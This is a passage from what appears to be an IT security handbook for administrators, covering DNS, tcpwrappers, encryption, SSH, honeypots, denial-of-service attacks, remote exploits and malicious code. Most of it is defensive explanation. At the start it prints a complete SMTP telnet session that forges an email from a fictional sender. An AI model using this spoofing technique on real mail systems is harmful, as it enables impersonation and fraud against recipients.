of the telnet program is now strongly discouraged.) For instance, you might connect to port 25 (the SMTP port) to fake some mail without going through the normal mailer: % telnet control.mil 25 Trying 45.1.12.2 ... Connected to hq.control.mil. Escape character is '^]'. 220 hq.control.mil ESMTP Sendmail 8.11.6/8.11.6; Sun, 18 Aug 2002 21:21:03 ­0500 HELO kaos.org 250 hq.control.mil Hello kaos.org, pleased to meet you MAIL FROM: 250 ... Sender ok RCPT TO: 550 ... Recipient ok DATA 354 Enter mail, end with "." on a line by itself To: agent99 From: Max Subject: tonight 99, I know I was supposed to take you out to dinner tonight, but I have been captured by KAOS agents, and they won't let me out until they finish torturing me. I hope you understand. Love, Max . 250 UAA01441 Message accepted for delivery PART QUIT 221 hq.control.mil closing connection FIVE Connection closed by foreign host. % 308 IT SECURITY FOR TECHNICAL ADMINISTRATORS Hostnames and DNS A hostname is the name of a computer on the Internet. Hostnames make life simpler for users: they are easier to remember than IP addresses. You can change a computer's IP address but keep its hostname the same. A single hostname can have more than one IP address, and a single IP address can be associated with more than one hostname. Both of these facts have profound implications for people who are attempting to write secure network programs. Hostnames must begin with a letter or number and may contain letters, numbers, and a few symbols, such as the hyphen (-)240. Case is ignored. A sample hostname is tock.cerias.purdue.edu. For more information on hostnames, see RFC 1122 and RFC 1123. Each hostname has two parts: the computer's machine name and its domain. The computer's machine name is the name to the left of the first period; the domain name is everything to the right of the first period. In our example above, the machine name is tock, and the domain is cerias.purdue.edu. The domain name may represent further hierarchical domains if there is a period in the name. For instance, cerias.purdue.edu represents the CERIAS center domain, which is part of the Purdue University domain, which is, in turn, part of the Educational Institutions top- level domain. In the early days of the Internet, a single file (/etc/hosts) contained the address and name of each computer on the Internet. But as the file grew to contain thousands of lines, and as changes to the list of names started being made on a daily basis, a file soon became impossible to maintain. Instead, the Internet developed a distributed network-based naming service called the Domain Name Service (DNS). DNS implements a large-scale distributed database for translating hostnames into IP addresses and vice-versa, and performing related name functions. The software performs this function by using the network to resolve each part of the hostname distinctly. For example, if a computer is trying to resolve the name girigiri.gbrmpa.gov.au, it would first get the address of a root domain server (usually stored in a file) and ask that machine for the address of an autop-level domain server. The computer would then ask the au domain server for the address of a gov.au domain server, and then would ask that machine for the address of a gbrmpa.gov.au domain server. Finally, the computer would then ask the gbrmpa.gov.au domain server for the address of the computer called girigiri.gbrmpa.gov.au. A variety of caching techniques are employed to minimize overall network traffic. DNS hostname lookups are typically performed over UDP, but DNS also uses TCP for some operations. IP Security The Internet and the IP protocols are vulnerable to many different kinds of attacks, including password guessing, social engineering, bugs in software, network sniffing, packet spoofing and data tampering, connection hijacking, and denial of service attacks. Many of these attacks were anticipated years before they arose in the wild. Yet the IP protocols and the Internet itself are not well-protected against them. IP was not designed to provide security and is not resilient to purposeful attack. Several techniques can add security to IP networks. These include application access controls, using encryption, advanced authentication systems, SSH, and decoy systems (honeypots). Each is discussed in detail below. In addition, the use of firewalls (discussed earlier), hardening server hosts (discussed in chapter 5-5), and physical isolation of vulnerable systems can be employed to enhance security. 240Technically, hostnames should not contain the underscore (_) character, but most systems that map hostnames to IP addresses grudgingly accept the underscore, and Microsoft's Active Directory service effectively requires it, in violation of at least one RFC. Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 309 Application Access Controls Many network applications can be configured with access control lists that determine which hosts are permitted to connect to the application (or, in a less secure but common configuration, which hosts are prohibited from connecting). On Unix systems, a standard access control mechanism for applications has developed around Wietse Venema's tcpwrappers system, which consists of a library for access control checking (libwrap), a wrapper program for adding access checks to network servers that don't use the library (tcpd), and a pair of access control configuration files (/etc/hosts.allow and /etc/hosts.deny). On modern systems, /etc/hosts.deny should contain a catchall deny rule ("ALL:ALL"), while /etc/hosts.allow should contain rules that permit access to specific services by specific hosts. In addition to permitting or denying connections, the tcpwrappers system can perform double reverse name lookups, do extra logging, perform ident lookups on connections (see below), send banners to connecting clients, and even run auxiliary commands or substitute a fake environment to study the behavior of the connecting client. Accordingly, tcpwrappers can make up for deficiencies in other network server programs. For details on configuring tcpwrappers, see PUIS, 315-323. On other operating systems, each application typically manages its own access control lists (or relies on the system's host-based packet filter). Using Encryption to Protect IP Networks from Eavesdropping IP is designed to get packets from one computer to another computer; the protocol makes no promise as to whether other computers on the same network will be able to intercept and read those packets in real time. Such interception is called eavesdropping or packet sniffing. On Ethernet and unswitched twisted-pair networks, the potential for eavesdropping is high because packets can be intercepted by any host on the network. Using an Ethernet switch can dramatically reduce the potential for eavesdropping. A switch is a special-purpose device that transmits packets only to the computers for which they are destined. However, it is still possible to monitor a switched network by programming the switch to create a mirror or monitor port, or to attack a switch to attempt to confuse its internal table associating computers and addresses. Although token ring networks are not inherently broadcast, in practice all packets that are transmitted on the ring pass through, on average, one-half of the interfaces that are on the network, so equivalent concerns apply. As discussed earlier in this chapter, telephone lines and wireless networks can also be sniffed; in a similar fashion, IP transmissions over cable TV or power lines can be intercepted. In short, with most network technologies it is impossible to prevent or even detect eavesdropping. The only thing you can do is assume that your network traffic is in fact being eavesdropped and use encryption so that the recorded network traffic will not be useful to an attacker241. There are several places where encryption can be used to improve the security of IP networking protocols: Link-level encryption PART With link-level encryption, packets are automatically encrypted when they are transmitted over an unsecure data link and decrypted when they are received. Eavesdropping is defeated because an eavesdropper does not know how FIVE to decrypt packets that are intercepted. Link-level encryption is available on many radio-networking products, but is harder to find for other broadcast network technologies such as Ethernet or FDDI. Special link encryptors are available for modems and leased-line links. 241Even with encryption, however, the source and destination addresses and ports of packets can be determined by an attacker and used for traffic analysis. 310 IT SECURITY FOR TECHNICAL ADMINISTRATORS End-to-end encryption With end-to-end encryption, the host transmitting the packet encrypts the packet's data; the packet's contents are automatically decrypted when they are received at the other end. Some organizations that have more than one physical location use encrypting routers for connecting to the Internet. These routers automatically encrypt packets that are sent from one corporate location to the other to prevent eavesdropping by attackers on the Internet (these are known as VPNs); however, the routers do not encrypt packets that are sent from the organization to third-party sites on the network. Today, this kind of packet-level encryption is typically implemented using the IPsec protocol (described in RFC 2401). IPsec can be used to transparently encrypt all communications between two hosts, between a host and a network, or between two networks. Using IPsec is a powerful way to automatically add encryption to systems that otherwise do not provide it. Application-level encryption Instead of relying on hardware to encrypt data, encryption can be done at the application level. For example, the Kerberos version of the telnet command can automatically encrypt the contents of the telnet data stream in both directions. The Secure Shell protocol (ssh) automatically provides for encryption of the data stream. Application-level encryption can also be provided by tunneling or wrapping an existing application-level protocol using a second protocol. For example, the Secure Shell protocol provides for TCP/IP ports and connections to be "forwarded" from one host to another over a cryptographically-protected tunnel. Individual application servers and clients can also be wrapped using the SSL and TLS protocols. Simply using encryption is not enough: the encryption must be properly implemented for it to provide protection. As discussed above, WEP, the original encryption standard for 802.11b wireless LANs does not provide any true confidentiality at all: the encryption implementation is flawed, and it is trivial to determine the encryption keys used by WEP systems. Advanced Authentication Systems Most IP services do not provide a strong system for positive authentication. As a result, an attacker can transmit information and claim that it comes from another source. The lack of positive authentication presents problems, especially for services such as DNS, electronic mail, and Netnews (Usenet). In all of these services, the recipient of a message, be it a machine or a person, is likely to take positive action based on the content of a message, whether or not the message sender is properly authenticated. Authentication systems have been developed for each of these services. DNS supports the cryptographic signing of zone data and authentication between nameservers using a shared secret key, mail servers can authenticate valid senders against a database using the SMTP AUTH extension, and Usenet messages can be cryptographically signed with PGP. However, adoption of these systems has not been widespread to date. IPsec, discussed above, also provides for strong authentication between peers. IP traffic received over such a VPN is more likely to be from the source that it claims to be, but for most Internet services, VPNs will not be used. ident Many of the authentication problems arise because the TCP/IP protocol is a system for creating communication channels between computers, and not between users. When a server receives a TCP/IP connection from a client, it Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 311 knows the IP address of the client. However, the server has no way to readily ascertain the name of the person who initiated the TCP/IP connection. When the TCP/IP protocol suite was developed, there was no need for a general-purpose approach for learning the names of people initiating TCP/IP connections. Protocols that required usernames (e.g., SMTP and FTP) provided them. As the Internet has grown, network managers have discovered a very important reason for knowing the name of a person initiating a TCP/IP connection: accountability. If a remote system administrator discovers that her computer was attacked at 5:00 p.m. by a user at a computer named fas.harvard.edu , it is important to be able to trace that attack back to the specific user and account that was responsible for the attack so that either the user can be punished or the compromised account can be terminated. The identification protocol gives you a way of addressing this problem with a simple callback scheme. When a server wants to know the "real name" of a person initiating a TCP/IP connection, it simply opens a connection to the client machine's ident daemon (identd) and sends a description of the TCP/IP connection in progress; the remote machine sends a human-readable representation of the user who is initiating the connection. Traditionally, the information sent back to the requesting system was the user's username. More recent implementations of the ident daemon provide for an encrypted token to be sent back; the token can later be decrypted by the remote site with the cooperation of the site running the ident daemon. This prevents identd lookups from being used to get username information on a remote host without its cooperation. The identification protocol depends on the honesty of the computer that is originating the TCP/IP connection. If your system is under attack from a multiuser system that has not been otherwise compromised, identd may be valuable. On the other hand, if your system is under attack from a single-user computer that is not running identd or is running an identd that has been gimmicked to give untrue or misleading information, the response may be worthless. Because major IRC networks require clients to run an ident daemon, there are many free Windows-based ident daemons that return false responses. In general, the responses of identd queries are more useful to the administrators of the site that sends the response than they are to the site that receives it. Thus, logging ident queries may not help you, but can be a courtesy to others--it lets the remote site know which account was involved in the attack. That's especially useful if the attacker went on to erase log files or otherwise damage the originating site. Not surprisingly, identd has been most useful in tracking down attackers originating at universities and other organizations with large multiuser Unix systems. Sites that have nonprivileged interactive Unix users should run ident to help track down accounts that have been compromised during an incident. SSH (Secure Shell) Originally developed by Tatu Ylonen, SSH (the Secure Shell) is a cryptographically-enabled protocol for remote login, file copying, and TCP connection tunneling (also known as port forwarding by SSH users.) Although originally implemented solely by Tatu Ylonen's ssh command-line Unix utility, today the SSH protocol is implemented by PART dozens of programs on many platforms. The two most popular implementations are Ylonen's original SSH, and OpenSSH, developed by the Open-BSD Project. Commercial clients and servers are also available. FIVE SSH has become a crucial piece of network security infrastructure because it can replace several protocols and programs that transmit plaintext passwords (including telnet, rlogin, rsh, rcp, rdist, and ftp). In addition, the TCP connection tunneling facility makes it possible to use SSH as the basis for a virtual private network. SSH has particular support for tunneling the X-Windows protocol. 312 IT SECURITY FOR TECHNICAL ADMINISTRATORS There are two versions of the SSH protocol. Although both protocols allow the symmetric cipher to be negotiated, SSH Version 1 relies on the RSA public key encryption algorithm for authentication and initial key exchange. SSH Version 2 has extended the protocol by allowing both the RSA and the DSA public key encryption algorithms and has corrected several flaws in the SSH1 protocol. Version 2 is therefore recommended. Host authentication with SSH Every host that runs an SSH server is supposed to have its own unique RSA public and private key pair, called the SSH HostKey. Version 2 servers have a second key pair called the HostDSAKey that uses the DSA encryption algorithm. Most SSH startup scripts will automatically create this key the first time that the server is run if the key does not already exist. When an SSH client connects to the server, the server provides its public key. This key serves two purposes. First, the client uses this key to encrypt information that is sent back to the server during the authentication phase. Second, the public key is used by the server to establish its identity. Each time a client connects to the server, the server provides the same public key to the client; the client is thus able to determine, each time it connects to the server, that it is communicating with the same server as it was on previous occasions. The host key protects against two kinds of attacks. First, it assures that you are connecting to the correct host. If the host you intend to connect to has changed its IP address or has a new DNS name (or if somebody has attacked your DNS system and it is handing out the wrong IP addresses), the SSH client will note that the new host has a different HostKey from the older address and you will, presumably, not provide your password. Second, the HostKey assures that you will have an encrypted connection directly to the remote server, and that no intermediate machine is engaging in a man-in-the-middle attack. For a successful man-in-the-middle attack to take place, an attacker would need to provide his own public key--a public key to which he presumably had the matching private key. (An attacker mounting a man-in-the-middle attack would not provide the HostKey of the server under attack because if he did, he would be unable to decrypt the resulting communications.) Unfortunately, HostKeys seem to change on a fairly regular basis -- sometimes whenever a new operating system is installed, or when a new SSH installation inadvertently creates a new host key, rather than preserving the old one. Therefore, if the HostKey of a server that you communicate with changes, you shouldn't assume that the server has been compromised or that a man-in-the-middle attack is taking place. But you might want to look into why the key was changed. Client authentication with SSH When a client connects to the SSH server, the client provides the username of the account that it wishes to use. It then provides a suitable authentication credential to prove that it is entitled to the account. If the server is satisfied by the client's credentials, it starts up a copy of the user's shell, and logs the user in. SSH offers a variety of secure methods for authenticating clients to the server's operating system:242 · Clients can provide a valid password for the account on the remote server. This password is not transmitted in plain text. · Clients can prove their identities using public key cryptography, if the client presents a public key that is in the user's authorized keys file and the client can decrypt information that is encrypted with that public key. · Clients can authenticate using Kerberos, one-time passwords, or other challenge/response systems available on the server. 241SSH also offers some less secure methods that are based on the client's IP address and should generally be avoided. Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 313 TCP connection tunneling SSH can tunnel a TCP connection between a second client and server. First, the ssh client is used to make a connection to the ssh server on the remote machine, and to request a tunnel to given other port on the remote machine. If the ssh client successfully authenticates and connects, it listens on a new port on the local machine; the ssh server initiates a connection to the second server on the remote machine. The second client is directed to connect to the new port on the local host, and data received on this new port is transmitted by ssh to the remote sshd server, which passes it on to the second remote server. Some protocols cannot be protected with a simple TCP tunnel. FTP, for example, requires multiple tunnels (some of which are difficult to predict), and so most SSH distributions provide a substitute ftp client (often called sftp) that works as users expect an FTP program to, but uses an SSH connection. The X-Windows protocol presents some similar difficulties, but specific support for tunneling X-Windows connections is available in most SSH applications. Instead of running a remote X client on a local X server, SSH creates a tunnel and a virtual X display that the remote client can safely use to communicate with the local server via SSH. Decoy Systems A final approach to subverting attackers is to set up decoy systems for the attackers to attack. Decoy systems are closely monitored; often these systems are built with known vulnerabilities to increase their likelihood of attack. Decoy systems, sometimes called honeypots or honeynets have two primary advantages: 1. Because they are closely monitored, decoy systems can be used to learn about attackers. Decoy systems can reveal attacker locations, techniques, motivations, skill levels, objectives, and many other pieces of information. 2. If a decoy system is sufficiently rich and compelling, exploring that system might consume so much of the attacker's time that the attacker will not have the time to attack systems that you actually care about. For example, Brad Spencer has championed the use of honeypot open relays to monitor and distract e-mail spammers (for some details, see http://fightrelayspam.homestead.com/files/antispam06132002.htm). Decoy systems are not without their risks. The first risk is that the attacker will find something of value in the system. You must make absolutely certain that there is nothing on the decoy system that an attacker could use to harm you. Specifically, the decoy system should contain no information about your organization. One way to accomplish this goal is to use only new computers for your decoy system, rather than computers repurposed from other projects. Furthermore, if your organization has a firewall, the decoy system should be outside the firewall. A second risk of decoy systems is that they can become platforms for attacking other computers on the Internet-- possibly making you liable for third-party civil damages or even for charges of criminal conspiracy! For both of these reasons, you should think carefully--and possibly consult with an attorney--before setting up a decoy or honeypot system. PART FIVE 314 IT SECURITY FOR TECHNICAL ADMINISTRATORS CHAPTER 8. ATTACKS AND DEFENSES At a Glance Many techniques have been developed to attack workstations and servers. These techniques can be broadly divided into three categories: Denial of service attacks and remote exploits Vulnerabilities exist in many computers that make it possible for an attacker to disable the system without otherwise compromising it. In many cases, denials of service can be performed over the network without actually logging into the system. In other cases, attackers use network access to compromise and penetrate vulnerable systems. Programmed threats Another way for an attacker to compromise a system is to provide the system's users with a hostile program and wait for them to run the program. Some programs install hidden services that give attackers remote access; others replicate themselves and travel between computers. Social engineering In a social engineering attack, the attacker takes advantage of the natural helpfulness of your users or administrators to cause them to reveal secrets or take inappropriate actions. Each of these classes of attacks is covered in greater detail in this chapter, along with recommended defense practices. Denial of Service Attacks A denial of service attack is an attack in which one user takes up so much of a shared resource that none of the resource is left for other users. Denial of service attacks compromise the availability of the resources. Those resources can be processes, disk space, processor time, printer paper, modems, or the time of a harried system administrator. The result is degradation or loss of service. Broadly speaking, there are two types of denial of service attacks: Destructive attacks Such attacks damage or destroy resources so you can't use them. Examples range from causing a disk crash that halts your system to deleting critical system files. Overload attacks Such attacks overload some system service or exhaust some resource (either deliberately by an attacker, or accidentally as the result of a user's mistake), thus preventing others from using that service. This simplest type of overload involves filling up a disk partition so users and system programs can't create new files. A network-based overload attack could bombard a network server with so many requests that it is unable to service them, or it could flood an organization's Internet connection so that there would be no bandwidth remaining to send desired information. Many modern operating systems provide many mechanisms for protecting against denial of service. You may be able to limit the maximum number of files or processes that a user is allowed, the amount of disk space that each user is allotted, and even the amount of CPU time that each user process may consume. Network services can be limited Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 315 in terms of CPU time and rate. Nevertheless, many systems in the field remain vulnerable to denial of service attacks because the protective measures are typically not enabled nor properly set. Destructive Attacks There are a number of ways to destroy or damage information in a fashion that denies service. Almost all of the known attacks can be prevented by restricting access to critical accounts and files, and protecting them from unauthorized users. If you follow good security practices to protect the integrity of your system, you will also prevent destructive denial of service attacks. Overload Attacks In an overload attack, a shared resource or service is overloaded with requests to such a point that it is unable to satisfy requests from other users. For example, if one user spawns enough processes, other users won't be able to run processes of their own. If one user fills up the disks, other users won't be able to create new files. You can partially protect against overload attacks through the use of quotas and other techniques that limit the amount of resources that a single user can consume. You can use physical limitations as a kind of quota -- for example, you can partition your computer's resources, and then limit each user to a single partition. Finally, you can set up systems for automatically detecting overloads and restarting your computer -- although giving an attacker the capability to restart your computer at will can create other problems. Process, CPU, and Memory Overload Problems One of the simplest denial of service attacks is a process attack. In a process attack, one user makes a computer unusable for others who happen to be using the computer at the same time. Another common process-based denial of service occurs when a user spawns many processes that consume large amounts of CPU or disk bandwidth. Yet another is when a user's programs use up all of the system's memory (physical and virtual). Such programs are sometimes called bacteria or rabbits, in tribute to their rapid spawning. These attacks are generally of concern only with shared computers: the fact that a user incapacitates his or her own workstation is of no interest if nobody else is using the machine. For suggestions on recovering from a process- based attack, see (PUIS, Chapter 24). The best way to deal with overload problems is to educate your users about how to share the system fairly. If CPU- intensive jobs are common and you have a network of similar machines, you may wish to investigate a distributed task scheduling system. Quotas and limits, if supported by the operating system, can also be helpful. Disk Attacks Another way of overwhelming a system is to fill a disk partition. If one user fills up the disk, other users won't be able to create files or do other useful work. Sometimes disks fill up suddenly when an application program or a user erroneously creates too many files (or a few files that are too large). Other times, disks fill up because many users PART are slowly increasing their disk usage. FIVE Most operating systems provide commands to help the administrator examine disk space usage by device and user and make decisions about files to delete to recover more space. An effective way to protect your system from disk attacks is to use your operating system's disk quota feature (usually available on POSIX-based systems). With disk quotas, each user can be limited in their disk use. Disk quotas typically need to be specified for each disk partition or filesystem that users can access ­ don't forget about the partitions that store e-mail boxes, or that provide temporary filespace to processes. 316 IT SECURITY FOR TECHNICAL ADMINISTRATORS You can also help protect your system from disk attacks and accidents by dividing your hard disk into several smaller partitions. Place different users' home directories on different partitions. If one user fills up one partition, users on other partitions won't be affected. Drawbacks of this approach include needing to move directories to different partitions if they require more space, and an inability to hard-link files between some user directories on systems that support hard links. If you run network services that have the potential to allow outsiders to use up significant disk space (e.g., incoming mail or an anonymous FTP site that allows uploads), consider isolating them on separate partitions to protect your other partitions from overflows. Temporarily losing the ability to receive mail or files is an annoyance, but losing access to the entire server is much more frustrating. Some filesystems, particularly those used on Unix systems, automatically reserve a portion of the disk that can only be used by superuser processes. This feature can help protect the system when the disk is full by allowing the superuser to log in and administer the system. On filesystems that don't provide this feature, you can simulate it by creating a large dummy file on the disk that you can later delete if you need to recover space in an emergency. Network Denial of Service Attacks Networks are also vulnerable to denial of service attacks. In attacks of this kind, someone prevents legitimate users from using the network. Network denials of service come in several flavors. Service Overloading Service overloading occurs when floods of network requests are made to a server daemon on a single computer. These requests can be initiated in a number of ways, both accidental and intentional. Service overloading can cause the system to be so busy servicing network interrupt requests that it can't perform any other tasks in a timely fashion. Many requests will be thrown away as there is no room to queue them. Invariably, the legitimate requests will be resent, further adding to your computer's load. If a service that causes a daemon to start a new process is under attack, your system may spawn so many new processes that it has no process table entries remaining to perform useful work. Similarly, the attack may cause the service may consume too much memory, CPU, or disk space. The overload caused by the attack may be the ultimate goal of the attacker. Alternatively, the attack may be planned to mask an attack somewhere else. For example, a machine that records audit records may be attacked to prevent a login or logout from being logged in a timely manner. The overloading attack may be staged merely to distract attention or clog communications lines while something else, such as a car bombing, is taking place. You can use a network monitor to reveal the type, and sometimes the origin, of overload attacks. If you have a list of machines and their hardware addresses (i.e., Ethernet board-level address, not IP address) this may help you track the source of the problem if it is local to your network. Isolating your local subnet or network while finding the problem may also help. If you have logging on your firewall or router, you can quickly determine if the attack is coming from outside your network or inside--you cannot depend on the source IP address in the packet being correct. Although you cannot prevent overload attacks, there are many measures that you can take to limit their damage or make your system more robust against them. Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 317 Prepare for the attack Install monitoring, logging, and other analysis systems, so that if an attack takes place, you will be able to rapidly diagnose the type of attack and, hopefully, the source. Have (protected) spare taps on your subnet so you can quickly hook up and monitor network traffic. Have printed lists of machine hardware and IP addresses available so you can determine the source of the overload by observing packet flow. Partition your network into multiple subnets This way, if one subnet gets flooded as part of an attack or accident, not all of your machines are disabled. Provide for multiple Internet connections to your organization These connections may include some that are not advertised but are kept in reserve. Use "throttle" controls in your applications Some applications have a "throttle" built in. If too many requests are received in too short a time, they will start rejecting requests and log a message that the service is failing. This is done under the assumption that some bug has been triggered to cause all the traffic. This has the side-effect of disabling your service as surely as if all the requests were accepted for processing. However, it may prevent the server itself from failing, and it results in an audit record showing when the problem occurred. Make sure the limits specified in your configuration file are reasonable For example, if you are running the Apache web server, a sudden increase in the number of requests to your server can cause a large number of http processes to be fork()'ed off. The total number of simultaneous connections is controlled by the parameter MaxClients in the Apache configuration file httpd.conf. Many Apache distributions have MaxClients set at the value of 200, meaning that a maximum of 200 separate http processes might exist. If each httpd process has a memory of 8 megabytes, that could conceivably take 1.6 gigabytes of swap space. On the other hand, if each http process is taking 20 megabytes, then you would need 40 gigabytes of swap space -- probably more than your system has. Message Flooding Message flooding occurs when a user slows down the processing of a system on the network, to prevent the system from processing its normal workload, by "flooding" the machine with network messages addressed to it. These may be requests for file service or login, or they may be simple echo-back requests. Whatever the form, the flood of messages overwhelms the target so it spends most of its resources responding to the messages. In extreme cases, this flood may cause the machine to crash with errors or lack of memory to buffer the incoming packets. This attack denies access to a network server. A server that is being flooded may not be able to respond to network requests in a timely manner. An attacker can take advantage of this behavior by writing a program that answers network requests in the server's place. For example, an attacker could flood an NIS server and then issue his own replies for NIS requests--specifically, requests for passwords. PART A similar type of attack is a broadcast storm. By careful crafting of network messages, you can create a special FIVE message that instructs every computer receiving the message to reply or retransmit it. The result is that the network becomes saturated and unusable. Prior to the late 1990s, broadcast storms almost always resulted from failing hardware or from software that is under development, buggy, or improperly installed. However, it is possible to craft an intentional broadcast storm, and the so-called smurf and fraggle attacks were examples of such storms. 318 IT SECURITY FOR TECHNICAL ADMINISTRATORS Broadcasting incorrectly formatted messages can also bring a network of machines to a grinding halt. If each machine is configured to log the reception of bad messages to disk or console, storms can generate so many messages that the clients can do nothing but process the errors and log them to disk or console. Once again, preparing ahead with a monitor and breaking your network into subnets will help you prevent and deal with this kind of problem, although such planning will not eliminate the problem completely. In addition, some packet-filtering firewalls (external or host-based) can perform connection-rate-throttling to reduce the impact of these kinds of attacks. The Linux 2.4 kernel's netfilter component is particularly notable in this regard. It is important that all routers and firewalls be correctly configured to prevent forwarding of broadcast packets other than from authorized hosts. Check your vendor documentation for information on how to do this. CERT/CC advisory CA-1998-01, available from their WWW site, provides details on how to configure many common systems to stop such forwarding. Most attack software that initiates denial-of-service attacks uses randomly-generated source addresses to decrease the likelihood that they will be intercepted. As a result, egress filters on borer routers will frequently stop computers within your network from participating in distributed denial of service attacks -- and if they are still involved, it will make it much easier to trace them, because the attack packets will have proper return addresses. Clogging (SYN Flood Attacks) The implementation of the TCP/IP protocols on some operating systems allow them to be abused in various ways. One way to deny service is to use up the limit of partially open connections. TCP connections open on a multi-way handshake to open a connection and set parameters. If an attacker sends multiple requests to initiate a connection ("SYN" packets) but then fails to follow through with the subsequent parts of the connection, the recipient will be left with multiple half-open connections that are occupying limited resources. Usually, these connection requests have forged source addresses that specify nonexistent or unreachable hosts that cannot be contacted. Thus, there is also no way to trace the connections back. They remain until they time out (or until they are reset by the intruder). Such attacks are often called SYN flood attacks or, more simply, clogging. There are many solutions to the problems of SYN floods. Some operating systems will automatically detect when they are being subjected to a SYN flood attack and will lower the timeout for SYN packets. Alternatively, if the table of half-opened connections is filled, the operating system can choose to randomly drop one of the entries from the table. As the table usually only fills up when the system is under attack, the odds are overwhelming that one of the attacker's SYN packets will be dropped. Finally, the server can use SYN cookies. When SYN cookies are in use, the SYN+ACK that is sent from the TCP server to the TCP client contains enough information for the server to reconstruct its half of the TCP connection, allowing the server to flush the original SYN from its tables. When the ACK is received from the client, the server reconstructs the original SYN, the TCP three-way hand-shake connection is completed, and the connection starts up. This effectively makes TCP setup a stateless process. SYN cookies were invented by Daniel Bernstein and are described in detail at http://cr.yp.to/syncookies.html. A SYN cookies implementation is included with BSD and Linux systems (but must be specifically enabled on Linux systems). Some operating systems allow you to change the queuing behavior for half-open connections. You can increase the size of the queue, and decrease the time before a half-open connection times out. Again, this is nonstandard in form, and some vendor versions require manipulation of kernel variables with a symbolic debugger. Check with your vendor for specifics. Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 319 Malformed traffic attacks In the past, bugs in low-level network drivers have caused many systems to fail when presented with a single malformed packet or HTTP query. For example, the infamous "Ping of Death" caused both Windows and Unix systems to crash when they received an ICMP packet that was longer than a specific threshold value. Many networked devices, including printer servers, home firewalls, and even routers, have crashed when they are probed for IIS or Apache vulnerabilities. In general, the only way to protect against malformed traffic is to use a proxy firewall and to be sure that your systems are properly updated. Distributed denials of service The most pernicious network attacks are distributed denials of service (DDoS) attacks. In a DDoS attack, the attacker overloads network services or floods the network with messages, but does so from a large number of different attack hosts distributed around the Internet. Because the attack packets do not come from a single system, it is difficult to block them with a packet filtering firewall without cutting your hosts off from the whole of the Internet. DDoS attacks are usually coordinated through slave processes (zombies or Trojans) installed in compromised hosts that allow the attacker to remotely direct the hosts to attack a target. A key to preventing DDoS attacks (and potential liability) is keeping your systems protected from compromise so that they cannot be used as zombies in further attacks. At the network level, implementing ingress and egress filtering to prevent packets with bogus source addresses from leaving the local network can prevent local machines from participating in DDoS attacks. This strategy is discussed in RFC2827. However, DDoS attacks do not require the use of special software. One form of DDoS attacks involves simply sending ICMP echo ("ping") messages with forged source addresses to many computers around the Internet. The ICMP echo messages are returned to the victim computer. Another version simply initiates a number of TCP connection attempts from nonexistent IP addresses. The target machine consumes resources initiating and verifying the connection attempt, and this can paralyze a machine if enough requests come in. Sometimes a DDoS attack can be defeated in progress by changing the IP address and hostname of the machine being attacked. If the attack software is using a hardcoded victim address or hostname, changing these can protect the victim host and packets directed at the old address can be filtered at the external router or by the organization's ISP. For example, the Blaster worm in August 2003 was designed to initiate a DDoS attack against a hardcoded address for the Microsoft Windows Update service. Microsoft responded by insuring that Windows Update would use a different IP address. One of the best known DDoS attacks took place in February 2000, and targeted web servers at high-profile companies like Amazon and Yahoo. An analysis of trinoo, the Trojan that was used to compromise and control the zombies that participated in the attack, can be found at http://www.sans.org/newlook/resources/IDFAQ/trinoo.htm PART FIVE 320 IT SECURITY FOR TECHNICAL ADMINISTRATORS Remote exploits Because network server applications are designed to communicate with untrusted outsiders, and because many run with special privileges, bugs in network server applications can often lead to remote exploits. Many remote exploits are based on the buffer overflow technique. This technique relies on the way that the C programming language lays out information inside the computer's memory. The remote system might try to store 100 bytes into a buffer that is only set up to hold 30 or 40 bytes. The resulting information overwrites the C program's stack frame and causes machine code specified by the attacker to be executed with the process's privileges.242 The most important defense against remote exploits is care in choosing and configuring networking software. Some application programs have repeatedly proven vulnerable, while others have been designed from the outset with security in mind and have a much lower rate of compromise. This defense is covered in greater depth in the chapter on Server Security. Programmed Threats Computers are designed to execute instructions one after another. These instructions usually do something useful-- calculate values, maintain databases, and communicate with users and with other systems. Sometimes, however, the instructions executed can be damaging or malicious in nature. When the damage happens by accident, we call the code involved a software bug. Bugs are perhaps the most common cause of unexpected program behavior. But if the source of the damaging instructions is an individual who intended that the abnormal behavior occur, the instructions are malicious code, or a programmed threat. Some people use the term malware to describe malicious software. These days, most programmed threats arrive via the Internet, in the form of either an e-mail message or a direct attack on a network-based server. A received e-mail message or direct attack may be the result of a random event -- your organization's web server might be randomly chosen -- or it may be deliberate: you may have been specifically targeted by a adversary. It is easy to mistake a directed attack for a random one, and vice-versa. A directed attack is much more worrisome than a random one, as a motivated attacker may continue to assault your organization until the attacker is successful or is stopped. Users may also be unwitting agents of transmission for viruses, worms, and other such threats. They may install new software from outside, and install embedded malicious code at the same time. They may run a "screen saver" or download a pornographic "viewer" from the Internet that contains a Trojan horse. Of course, most programs that are downloaded from the Internet do not contain any hostile code at all. However, the widespread practice of downloading and running code from untrusted sources makes it all the easier for hostile programs to be successful. You must therefore be extremely cautious about importing source code and command files from outside sources. High-security sites should avoid software that is not cryptographically signed by a trusted author. This won't necessarily protect you, but it will give you somebody to sue if things go wrong. If possible, never download binary files. Instead, read through and understand the source code of all software (if available) before installing a new package on your system. If you are suspicious of the software, don't use it, especially if it requires special privileges. Accept software only from trusted sources. Note that you should not automatically trust software from a commercial firm or group. Sometimes commercial firms insert back doors into their code to allow for maintenance, or recovering lost passwords; others have been known to 242This form of attack is at least 35 years old and well known. It is astonishing that vendors are still building software that can be exploited this way. Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 321 distribute privacy-invading "spyware" with their software. As long as customers are willing to purchase software that comes with broad disclaimers of warranty and liability, there will be little incentive for vendors to be accountable for the code they sell. Thus, you might want to seek other, written assurances about any third-party code you buy and install on your computers. Free software is no safer, although it has the advantage of providing source code that you can read for yourself. Most freeware (and open source) project software is written and maintained by multiple programmers. Contributions are often accepted without careful screening by other members of the group. Thus, a small addition can be made without being observed by others. Furthermore, even if the code is scanned, subtle dependencies and backdoors may not be recognized -- few people know how to carefully review software, and if they are not particularly interested in understanding every nuance, they may easily miss something nasty. Even an "independent" review may not be sufficient: besides lack of training, people can make mistakes, and sometimes there will even be collusion between the reviewer and the coder! Unfortunately, many programs that are downloaded and run are simply too big to read through on a routine 